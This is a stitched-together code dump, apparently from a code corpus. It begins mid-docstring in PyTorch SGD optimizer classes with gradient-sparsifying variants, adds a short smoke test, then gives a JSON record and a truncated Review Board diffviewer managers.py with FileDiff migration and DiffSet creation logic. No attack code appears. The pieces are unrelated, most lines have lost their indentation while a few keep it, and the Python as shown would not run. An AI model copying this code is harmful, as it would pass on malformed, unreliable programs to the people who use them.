other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(SGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
class sparseSGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
        >>> optimizer = sparseSGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
        Sutskever et al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
        This is in contrast to Sutskever et al. and
other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(sparseSGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(sparseSGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
                if p.grad is None:
                    continue
                d_p = p.grad
                # Sparsify the gradient by zeroing the first 30% of its
                # entries along the leading (output-filter) dimension.
                # Note that d_p aliases p.grad, so this zeroes the stored
                # gradient in place.
                dpsize = d_p.shape
                fn = dpsize[0]
                k = int(0.3 * fn)
                d_p[0:k] = 0
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
class sparserandSGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
        >>> optimizer = sparserandSGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
        Sutskever et al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
        This is in contrast to Sutskever et al. and
other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(sparserandSGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(sparserandSGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
#pdb.set_trace()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
                if p.grad is None:
                    continue
                d_p = p.grad
                dpsize = d_p.shape
                # Randomly sparsify the gradient: flatten it, zero a random
                # 80% of its entries with a binary mask, and restore the
                # original shape, so each step updates roughly 20% of the
                # coordinates.
                d_p = torch.flatten(d_p)
                mask = torch.ones(d_p.shape)
                indices = torch.randperm(mask.shape[0])
                indices = indices[:int(indices.shape[0] * 0.8)]
                mask[indices] = 0
                d_p = torch.mul(d_p, mask)
                d_p = torch.reshape(d_p, dpsize)
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
class sparsetopSGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
        >>> optimizer = sparsetopSGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
        Sutskever et al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
        This is in contrast to Sutskever et al. and
other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(sparsetopSGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(sparsetopSGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
                if p.grad is None:
                    continue
                d_p = p.grad
                dpsize = d_p.shape
                # Keep only the largest 25% of gradient entries by magnitude:
                # flatten, locate the smallest 75% of |grad|, zero them, and
                # restore the original shape. The clone keeps the surviving
                # entries' signs intact without touching p.grad.
                d_p = torch.flatten(d_p).clone()
                _, indices = torch.topk(d_p.abs(), 3 * int(d_p.shape[0] / 4),
                                        dim=0, largest=False)
                d_p[indices] = 0
                d_p = torch.reshape(d_p, dpsize)
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
```
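The three sparsified variants above keep the standard `torch.optim.SGD` interface; only the gradient-masking step differs. A minimal smoke test on a toy model (the layer sizes and data are arbitrary, and the optimizer classes are assumed importable from this module):
```python
import torch
from torch import nn

# Toy regression problem, just enough to exercise one optimizer step.
model = nn.Sequential(nn.Linear(10, 32), nn.ReLU(), nn.Linear(32, 1))
optimizer = sparsetopSGD(model.parameters(), lr=0.01, momentum=0.9)

x, y = torch.randn(64, 10), torch.randn(64, 1)
loss = nn.functional.mse_loss(model(x), y)

optimizer.zero_grad()
loss.backward()
optimizer.step()   # only the largest 25% of gradient entries are applied
print(loss.item())
```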
|
{
"source": "jeyaprabum/Reviewboard",
"score": 2
}
|
#### File: reviewboard/diffviewer/managers.py
```python
from __future__ import unicode_literals
import bz2
import gc
import hashlib
import os
import warnings
from django.conf import settings
from django.db import models, reset_queries, connection
from django.db.models import Count, Q
from django.db.utils import IntegrityError
from django.utils.encoding import smart_unicode
from django.utils.six.moves import range
from django.utils.translation import ugettext as _
from djblets.siteconfig.models import SiteConfiguration
from reviewboard.diffviewer.differ import DiffCompatVersion
from reviewboard.diffviewer.errors import DiffTooBigError, EmptyDiffError
from reviewboard.scmtools.core import PRE_CREATION, UNKNOWN, FileNotFoundError
class FileDiffManager(models.Manager):
"""A manager for FileDiff objects.
This contains utility methods for locating FileDiffs that haven't been
migrated to use RawFileDiffData.
"""
MIGRATE_OBJECT_LIMIT = 200
def unmigrated(self):
"""Queries FileDiffs that store their own diff content."""
return self.exclude(
(Q(diff64='') | Q(diff64__isnull=True)) &
(Q(parent_diff64='') | Q(parent_diff64__isnull=True)))
def get_migration_counts(self):
"""Returns the number of items that need to be migrated.
The result is a dictionary containing a breakdown of the various
counts, and the total count of all items for display.
"""
from reviewboard.diffviewer.models import LegacyFileDiffData
unmigrated_filediffs_count = self.unmigrated().count()
legacy_fdd_count = LegacyFileDiffData.objects.count()
return {
'filediffs': unmigrated_filediffs_count,
'legacy_file_diff_data': legacy_fdd_count,
'total_count': unmigrated_filediffs_count + legacy_fdd_count,
}
def migrate_all(self, batch_done_cb=None, counts=None, batch_size=40):
"""Migrates diff content in FileDiffs to use RawFileDiffData.
This will run through all unmigrated FileDiffs and migrate them,
condensing their storage needs and removing the content from
FileDiffs.
This will return a dictionary with the result of the process.
"""
from reviewboard.diffviewer.models import LegacyFileDiffData
total_diffs_migrated = 0
total_diff_size = 0
total_bytes_saved = 0
unmigrated_filediffs = self.unmigrated()
legacy_data_items = LegacyFileDiffData.objects.all()
if counts:
unmigrated_filediffs_count = counts['filediffs']
legacy_data_items_count = counts['legacy_file_diff_data']
total_count = counts['total_count']
else:
unmigrated_filediffs_count = unmigrated_filediffs.count()
legacy_data_items_count = legacy_data_items.count()
total_count = legacy_data_items_count + unmigrated_filediffs_count
migration_tasks = (
(self._migrate_filediffs,
unmigrated_filediffs,
unmigrated_filediffs_count),
(self._migrate_legacy_fdd,
legacy_data_items,
legacy_data_items_count),
)
for migrate_func, queryset, count in migration_tasks:
for batch_info in migrate_func(queryset, count, batch_size):
total_diffs_migrated += batch_info[0]
total_diff_size += batch_info[1]
total_bytes_saved += batch_info[2]
if callable(batch_done_cb):
batch_done_cb(total_diffs_migrated, total_count)
return {
'diffs_migrated': total_diffs_migrated,
'old_diff_size': total_diff_size,
'new_diff_size': total_diff_size - total_bytes_saved,
'bytes_saved': total_bytes_saved,
}
def _migrate_legacy_fdd(self, legacy_data_items, count, batch_size):
"""Migrates data from LegacyFileDiffData to RawFileDiffData.
This will go through every LegacyFileDiffData and convert them to
RawFileDiffData entries, removing the old versions. All associated
FileDiffs are then updated to point to the new RawFileDiffData entry
instead of the old LegacyFileDiffData.
"""
from reviewboard.diffviewer.models import RawFileDiffData
cursor = connection.cursor()
legacy_data_items = legacy_data_items.annotate(
num_filediffs=Count('filediffs'),
num_parent_filediffs=Count('parent_filediffs'))
for batch in self._iter_batches(legacy_data_items, count, batch_size):
batch_total_diff_size = 0
batch_total_bytes_saved = 0
raw_fdds = []
all_diff_hashes = []
filediff_hashes = []
parent_filediff_hashes = []
for legacy_fdd in batch:
raw_fdd = RawFileDiffData.objects.create_from_legacy(
legacy_fdd, save=False)
raw_fdds.append(raw_fdd)
binary_hash = legacy_fdd.binary_hash
old_diff_size = len(legacy_fdd.get_binary_base64())
batch_total_diff_size += old_diff_size
batch_total_bytes_saved += old_diff_size - len(raw_fdd.binary)
# Update all associated FileDiffs to use the new objects
# instead of the old ones.
if legacy_fdd.num_filediffs > 0:
filediff_hashes.append(binary_hash)
if legacy_fdd.num_parent_filediffs > 0:
parent_filediff_hashes.append(binary_hash)
all_diff_hashes.append(binary_hash)
try:
# Attempt to create all the entries we want in one go.
RawFileDiffData.objects.bulk_create(raw_fdds)
except IntegrityError:
                # One or more entries in the batch conflicted with an existing
# entry, meaning it was already created. We'll just need to
# operate on the contents of this batch one-by-one.
for raw_fdd in raw_fdds:
try:
raw_fdd.save()
except IntegrityError:
raw_fdd = RawFileDiffData.objects.get(
binary_hash=raw_fdd.binary_hash)
if filediff_hashes:
self._transition_hashes(cursor, 'diff_hash', filediff_hashes)
if parent_filediff_hashes:
self._transition_hashes(cursor, 'parent_diff_hash',
parent_filediff_hashes)
legacy_data_items.filter(pk__in=all_diff_hashes).delete()
yield (len(batch), batch_total_diff_size,
batch_total_bytes_saved, filediff_hashes,
parent_filediff_hashes, all_diff_hashes)
def _migrate_filediffs(self, queryset, count, batch_size):
"""Migrates old diff data from a FileDiff into a RawFileDiffData."""
for batch in self._iter_batches(queryset, count, batch_size):
batch_total_diff_size = 0
batch_total_bytes_saved = 0
for filediff in batch:
diff_size = len(filediff.get_diff64_base64())
parent_diff_size = len(filediff.get_parent_diff64_base64())
batch_total_diff_size += diff_size + parent_diff_size
diff_hash_is_new, parent_diff_hash_is_new = \
filediff._migrate_diff_data(recalculate_counts=False)
if diff_size > 0 and not diff_hash_is_new:
batch_total_bytes_saved += diff_size
if parent_diff_size > 0 and not parent_diff_hash_is_new:
batch_total_bytes_saved += parent_diff_size
yield len(batch), batch_total_diff_size, batch_total_bytes_saved
def _iter_batches(self, queryset, count, batch_size, object_limit=200):
"""Iterates through items in a queryset, yielding batches.
This will gather up to a specified number of items from a
queryset at a time, process them into batches of a specified
size, and yield them.
After each set of objects fetched from the database, garbage
collection will be forced and stored queries reset, in order to
reduce memory usage.
"""
if count == 0:
return
batch = []
for i in range(0, count, object_limit):
            # Every time we work on a batch, we're re-querying the list of
# objects. This result from the query is expected not to have any
# previously-processed objects from a yielded batch. It may,
# however, have objects we've previously seen that haven't been
# yielded in a batch yet. That's why we're indexing from the
# length of the batch to the object limit.
for item in queryset[len(batch):object_limit].iterator():
batch.append(item)
if len(batch) == batch_size:
yield batch
batch = []
# Do all we can to limit the memory usage by resetting any stored
# queries (if DEBUG is True), and force garbage collection of
# anything we may have from processing an object.
reset_queries()
gc.collect()
if batch:
yield batch
def _transition_hashes(self, cursor, hash_field_name, diff_hashes):
"""Transitions FileDiff-associated hashes to RawFileDiffData.
This queries all FileDiffs and RawFileDiffData entries referencing
the given list of diff hashes, and updates the FileDiffs to point
to those instead of the formerly-associated LegacyFileDiffDatas.
"""
from reviewboard.diffviewer.models import RawFileDiffData
legacy_hash_field_name = 'legacy_%s' % hash_field_name
# Since this is a pretty complex operation, we're going to sanity-check
# results on DEBUG setups, to help catch issues that might come up as
# this code changes.
if settings.DEBUG:
old_filediff_info = dict(
(filediff.pk, getattr(filediff, legacy_hash_field_name).pk)
for filediff in self.filter(**{
legacy_hash_field_name + '__in': diff_hashes,
})
)
else:
old_filediff_info = None
# If the database supports joins on updates, then we can craft
# a query that will massively speed up the diff transition time.
# Otherwise, we need to fall back on doing a select and then an
# update per result.
#
# The queries are different between databases (yay standards), so
# we can't be smart and do this in a generic way. We have to check
# the database types.
if connection.vendor == 'mysql':
cursor.execute(
'UPDATE %(filediff_table)s'
' INNER JOIN %(raw_fdd_table)s raw_fdd'
' ON raw_fdd.binary_hash = '
' %(filediff_table)s.%(hash_field_name)s_id'
' SET'
' raw_%(hash_field_name)s_id = raw_fdd.id,'
' %(hash_field_name)s_id = NULL'
' WHERE raw_fdd.binary_hash IN (%(diff_hashes)s)'
% {
'filediff_table': self.model._meta.db_table,
'raw_fdd_table': RawFileDiffData._meta.db_table,
'hash_field_name': hash_field_name,
'diff_hashes': ','.join(
"'%s'" % diff_hash
for diff_hash in diff_hashes
),
})
elif connection.vendor == 'postgresql':
cursor.execute(
'UPDATE %(filediff_table)s'
' SET'
' raw_%(hash_field_name)s_id = raw_fdd.id,'
' %(hash_field_name)s_id = NULL'
' FROM %(raw_fdd_table)s raw_fdd'
' WHERE'
' raw_fdd.binary_hash IN (%(diff_hashes)s) AND'
' raw_fdd.binary_hash = '
' %(hash_field_name)s_id'
% {
'filediff_table': self.model._meta.db_table,
'raw_fdd_table': RawFileDiffData._meta.db_table,
'hash_field_name': hash_field_name,
'diff_hashes': ','.join(
"'%s'" % diff_hash
for diff_hash in diff_hashes
),
})
else:
raw_fdds = RawFileDiffData.objects.filter(
binary_hash__in=diff_hashes).only('pk', 'binary_hash')
for raw_fdd in raw_fdds:
self.filter(**{
legacy_hash_field_name: raw_fdd.binary_hash
}).update(**{
hash_field_name: raw_fdd.pk,
legacy_hash_field_name: None
})
if settings.DEBUG:
new_filediff_info = dict(
(filediff.pk, getattr(filediff, hash_field_name).binary_hash)
for filediff in self.filter(pk__in=old_filediff_info.keys())
)
assert old_filediff_info == new_filediff_info
class RawFileDiffDataManager(models.Manager):
"""A custom manager for RawFileDiffData.
This provides conveniences for creating an entry based on a
LegacyFileDiffData object.
"""
def process_diff_data(self, data):
"""Processes a diff, returning the resulting content and compression.
If the content would benefit from being compressed, this will
return the compressed content and the value for the compression
flag. Otherwise, it will return the raw content.
"""
compressed_data = bz2.compress(data, 9)
if len(compressed_data) < len(data):
return compressed_data, self.model.COMPRESSION_BZIP2
else:
return data, None
def get_or_create_from_data(self, data):
binary_hash = self._hash_hexdigest(data)
processed_data, compression = self.process_diff_data(data)
return self.get_or_create(
binary_hash=binary_hash,
defaults={
'binary': processed_data,
'compression': compression,
})
def create_from_legacy(self, legacy, save=True):
processed_data, compression = self.process_diff_data(legacy.binary)
raw_file_diff_data = self.model(binary_hash=legacy.binary_hash,
binary=processed_data,
compression=compression)
raw_file_diff_data.extra_data = legacy.extra_data
if save:
raw_file_diff_data.save()
return raw_file_diff_data
def _hash_hexdigest(self, diff):
hasher = hashlib.sha1()
hasher.update(diff)
return hasher.hexdigest()
class DiffSetManager(models.Manager):
"""A custom manager for DiffSet objects.
This includes utilities for creating diffsets based on the data from form
uploads, webapi requests, and upstream repositories.
"""
# Extensions used for intelligent sorting of header files
# before implementation files.
HEADER_EXTENSIONS = ["h", "H", "hh", "hpp", "hxx", "h++"]
IMPL_EXTENSIONS = ["c", "C", "cc", "cpp", "cxx", "c++", "m", "mm", "M"]
def create_from_upload(self, repository, diff_file, parent_diff_file=None,
diffset_history=None, basedir=None, request=None,
base_commit_id=None, validate_only=False, **kwargs):
"""Create a DiffSet from a form upload.
This parses a diff and optional parent diff covering one or more files,
validates, and constructs :py:class:`DiffSets
<reviewboard.diffviewer.models.DiffSet>` and :py:class:`FileDiffs
<reviewboard.diffviewer.models.FileDiff>` representing the diff.
This can optionally validate the diff without saving anything to the
database. In this case, no value will be returned. Instead, callers
should take any result as success.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository the diff applies to.
diff_file (django.core.files.uploadedfile.UploadedFile):
The diff file uploaded in the form.
parent_diff_file (django.core.files.uploadedfile.UploadedFile, optional):
The parent diff file uploaded in the form.
diffset_history (reviewboard.diffviewer.models.DiffSetHistory, optional):
The history object to associate the DiffSet with. This is
not required if using ``validate_only=True``.
basedir (unicode, optional):
The base directory to prepend to all file paths in the diff.
request (django.http.HttpRequest, optional):
The current HTTP request, if any. This will result in better
logging.
base_commit_id (unicode, optional):
The ID of the commit that the diff is based upon. This is
needed by some SCMs or hosting services to properly look up
files, if the diffs represent blob IDs instead of commit IDs
and the service doesn't support those lookups.
validate_only (bool, optional):
Whether to just validate and not save. If ``True``, then this
won't populate the database at all and will return ``None``
upon success. This defaults to ``False``.
Returns:
reviewboard.diffviewer.models.DiffSet:
The resulting DiffSet stored in the database, if processing
succeeded and ``validate_only=False``.
Raises:
reviewboard.diffviewer.errors.DiffParserError:
There was an error parsing the main diff or parent diff.
reviewboard.diffviewer.errors.DiffTooBigError:
The diff file was too big to be uploaded, based on the
configured maximum diff size in settings.
reviewboard.diffviewer.errors.EmptyDiffError:
The provided diff file did not contain any file changes.
reviewboard.scmtools.core.FileNotFoundError:
A file specified in the diff could not be found in the
repository.
reviewboard.scmtools.core.SCMError:
There was an error talking to the repository when validating
the existence of a file.
reviewboard.scmtools.git.ShortSHA1Error:
A SHA1 specified in the diff was in the short form, which
could not be used to look up the file. This is applicable only
to Git.
"""
if 'save' in kwargs:
warnings.warn('The save parameter to '
'DiffSet.objects.create_from_upload is deprecated. '
'Please set validate_only instead.',
DeprecationWarning)
validate_only = not kwargs['save']
siteconfig = SiteConfiguration.objects.get_current()
max_diff_size = siteconfig.get('diffviewer_max_diff_size')
if max_diff_size > 0:
if diff_file.size > max_diff_size:
raise DiffTooBigError(
_('The supplied diff file is too large'),
max_diff_size=max_diff_size)
if parent_diff_file and parent_diff_file.size > max_diff_size:
raise DiffTooBigError(
_('The supplied parent diff file is too large'),
max_diff_size=max_diff_size)
if parent_diff_file:
parent_diff_file_name = parent_diff_file.name
parent_diff_file_contents = parent_diff_file.read()
else:
parent_diff_file_name = None
parent_diff_file_contents = None
return self.create_from_data(
repository=repository,
diff_file_name=diff_file.name,
diff_file_contents=diff_file.read(),
parent_diff_file_name=parent_diff_file_name,
parent_diff_file_contents=parent_diff_file_contents,
diffset_history=diffset_history,
basedir=basedir,
request=request,
base_commit_id=base_commit_id,
validate_only=validate_only)
def create_from_data(self, repository, diff_file_name, diff_file_contents,
parent_diff_file_name=None,
parent_diff_file_contents=None,
diffset_history=None, basedir=None, request=None,
base_commit_id=None, check_existence=True,
validate_only=False, **kwargs):
"""Create a DiffSet from raw diff data.
This parses a diff and optional parent diff covering one or more files,
validates, and constructs :py:class:`DiffSets
<reviewboard.diffviewer.models.DiffSet>` and :py:class:`FileDiffs
<reviewboard.diffviewer.models.FileDiff>` representing the diff.
This can optionally validate the diff without saving anything to the
database. In this case, no value will be returned. Instead, callers
should take any result as success.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository the diff applies to.
diff_file_name (unicode):
The filename of the main diff file.
diff_file_contents (bytes):
The contents of the main diff file.
parent_diff_file_name (unicode, optional):
The filename of the parent diff, if one is provided.
parent_diff_file_contents (bytes, optional):
The contents of the parent diff, if one is provided.
diffset_history (reviewboard.diffviewer.models.DiffSetHistory, optional):
The history object to associate the DiffSet with. This is
not required if using ``validate_only=True``.
basedir (unicode, optional):
The base directory to prepend to all file paths in the diff.
request (django.http.HttpRequest, optional):
The current HTTP request, if any. This will result in better
logging.
base_commit_id (unicode, optional):
The ID of the commit that the diff is based upon. This is
needed by some SCMs or hosting services to properly look up
files, if the diffs represent blob IDs instead of commit IDs
and the service doesn't support those lookups.
check_existence (bool, optional):
Whether to check for file existence as part of the validation
process. This defaults to ``True``.
validate_only (bool, optional):
Whether to just validate and not save. If ``True``, then this
won't populate the database at all and will return ``None``
upon success. This defaults to ``False``.
Returns:
reviewboard.diffviewer.models.DiffSet:
The resulting DiffSet stored in the database, if processing
succeeded and ``validate_only=False``.
Raises:
reviewboard.diffviewer.errors.DiffParserError:
There was an error parsing the main diff or parent diff.
reviewboard.diffviewer.errors.EmptyDiffError:
The provided diff file did not contain any file changes.
reviewboard.scmtools.core.FileNotFoundError:
A file specified in the diff could not be found in the
repository.
reviewboard.scmtools.core.SCMError:
There was an error talking to the repository when validating
the existence of a file.
reviewboard.scmtools.git.ShortSHA1Error:
A SHA1 specified in the diff was in the short form, which
could not be used to look up the file. This is applicable only
to Git.
"""
from reviewboard.diffviewer.diffutils import convert_to_unicode
from reviewboard.diffviewer.models import FileDiff
if 'save' in kwargs:
warnings.warn('The save parameter to '
'DiffSet.objects.create_from_data is deprecated. '
'Please set validate_only instead.',
DeprecationWarning)
validate_only = not kwargs['save']
tool = repository.get_scmtool()
parser = tool.get_parser(diff_file_contents)
files = list(self._process_files(
parser,
basedir,
repository,
base_commit_id,
request,
check_existence=check_existence and not parent_diff_file_contents))
# Parse the diff
if len(files) == 0:
raise EmptyDiffError(_("The diff file is empty"))
# Sort the files so that header files come before implementation.
files.sort(cmp=self._compare_files, key=lambda f: f.origFile)
# Parse the parent diff
parent_files = {}
# This is used only for tools like Mercurial that use atomic changeset
# IDs to identify all file versions but not individual file version
# IDs.
parent_commit_id = None
if parent_diff_file_contents:
diff_filenames = set([f.origFile for f in files])
parent_parser = tool.get_parser(parent_diff_file_contents)
# If the user supplied a base diff, we need to parse it and
# later apply each of the files that are in the main diff
for f in self._process_files(parent_parser, basedir,
repository, base_commit_id, request,
check_existence=check_existence,
limit_to=diff_filenames):
parent_files[f.newFile] = f
# This will return a non-None value only for tools that use
# commit IDs to identify file versions as opposed to file revision
# IDs.
parent_commit_id = parent_parser.get_orig_commit_id()
diffset = self.model(
name=diff_file_name, revision=0,
basedir=basedir,
history=diffset_history,
repository=repository,
diffcompat=DiffCompatVersion.DEFAULT,
base_commit_id=base_commit_id)
if not validate_only:
diffset.save()
encoding_list = repository.get_encoding_list()
filediffs = []
for f in files:
parent_file = None
orig_rev = None
parent_content = b''
if f.origFile in parent_files:
parent_file = parent_files[f.origFile]
parent_content = parent_file.data
orig_rev = parent_file.origInfo
# If there is a parent file there is not necessarily an original
# revision for the parent file in the case of a renamed file in
# git.
if not orig_rev:
if parent_commit_id and f.origInfo != PRE_CREATION:
orig_rev = parent_commit_id
else:
orig_rev = f.origInfo
enc, orig_file = convert_to_unicode(f.origFile, encoding_list)
enc, dest_file = convert_to_unicode(f.newFile, encoding_list)
if f.deleted:
status = FileDiff.DELETED
elif f.moved:
status = FileDiff.MOVED
elif f.copied:
status = FileDiff.COPIED
else:
status = FileDiff.MODIFIED
filediff = FileDiff(
diffset=diffset,
